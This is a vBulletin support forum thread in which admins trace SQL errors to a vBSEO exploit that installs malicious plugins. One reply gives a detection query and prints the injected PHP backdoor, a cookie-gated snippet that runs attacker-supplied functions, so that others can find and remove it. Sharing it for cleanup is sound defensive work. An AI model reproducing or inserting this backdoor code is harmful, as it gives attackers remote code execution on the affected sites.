Announcement

Collapse
No announcement yet.

sql database error and links changed to red?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by bill preston View Post
    Guys - i had this issue myself and fixed it with this thread:

    http://www.vbseo.com/f5/vbseo-securi...83/#post325546
    Is everyone else seeing this running vbseo?

    Comment


    • #17
      Originally posted by AlpineZone View Post
      Yeah I'm still stumped. THere are some remnant vBSEO files laying around but i don't even have the root /VBSEO folder any longer.
      Does a search for functions_vbseocp_abstract.php turn up anything?

      Comment


      • #18
        Looking more, I'm on an old version of vbseo, 3.3.2, in reviewing the previous site owner's notes we had essentially pulled it out, although there are still active plugins in the system. I don't think it ever worked correctly for him previously, so I have kind of a hodgepodge of files.

        Comment


        • #19
          I've applied the fix that vBSEO recommends, but I'm wondering if that will address the SQL issue people are having here with "pluginlist". Yesterday I noticed a random plugin got installed with hacky looking code, which vBSEO says this their patch will fix, but does it fix the datastore issue too?
          Ken Iovino
          Full Time PHP, Ruby and iOS Developer

          Comment


          • #20
            Originally posted by bstillman View Post
            Does a search for functions_vbseocp_abstract.php turn up anything?
            Might be a dumb question but no clue how to search via FTP

            Comment


            • #21
              Originally posted by AlpineZone View Post
              Might be a dumb question but no clue how to search via FTP
              Me neither. I use SSH.

              Comment


              • #22
                AlpineZone, if you can connect to your server using SSH, you can do a search for the file using the 'locate' or 'grep' command.

                Code:
                locate functions_vbseocp_abstract.php
                If that doesn't work, you can search for a unique text that that file will only have, something like this: (do it in your forums root)

                Code:
                grep -r "proc_deutf" *.php
                If you're using an older version of vBSEO, then you're not going to find it. I remember they changed their filesystem a couple of years ago
                Ken Iovino
                Full Time PHP, Ruby and iOS Developer

                Comment


                • #23
                  Also thinking it could have ot do with simply the age of the install, since I'm on 3.3.2

                  Comment


                  • #24
                    Go into your plugins and look for anything that looks weird... the exploit just adds some malicious plugins. Remove them, fix the exploit and you should be good to go.
                    My main site: PUA Forum

                    Comment


                    • #25
                      Im having the same problem you guys are.. the SAME thing..millions of error emails.. etc..I am simply an admin.. I know how to manage the forum and add users etc.. nothing with settings etc as I had that alll done for me..what are we going to do to fix this? Is there any vbulletin moderators on here to help out with this obvious mass problem?

                      Comment


                      • #26
                        Just so people know, you can quickly check if your site has been hit with vBSEO's exploit by running this mysql query:

                        Code:
                         select title, hookname, phpcode from plugin where phpcode like "%vbauth%"
                        If something does comes up, edit the hook via your plugin manager. You'll find some code that looks like this:
                        PHP Code:
                        /* vBulletin Templates Cookie Caching */
                            
                        $vbr="jnegaecq";$vbh="c33794aa91e3ec5bb71dd7a85f280d55";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
                        Remove it then apply the fix here:
                        http://www.vbseo.com/f5/vbseo-securi...83/#post325546
                        Ken Iovino
                        Full Time PHP, Ruby and iOS Developer

                        Comment


                        • #27
                          Originally posted by downeastboat View Post
                          Im having the same problem you guys are.. the SAME thing..millions of error emails.. etc..I am simply an admin.. I know how to manage the forum and add users etc.. nothing with settings etc as I had that alll done for me..what are we going to do to fix this? Is there any vbulletin moderators on here to help out with this obvious mass problem?
                          Shut your board down and apply this fix:
                          http://www.vbseo.com/f5/vbseo-securi...83/#post325546
                          Ken Iovino
                          Full Time PHP, Ruby and iOS Developer

                          Comment


                          • #28
                            Ken, thanks for the help, I'm getting 0 hits on the query you provided above (select titel, hookname, etc.)

                            Also ran Grep and Locate and couldn't find any of those files. So I'm a bit lost

                            Comment


                            • #29
                              Specifically where do I go to change that code?

                              Comment


                              • #30
                                Is there a specific plugin I can look at directly?

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X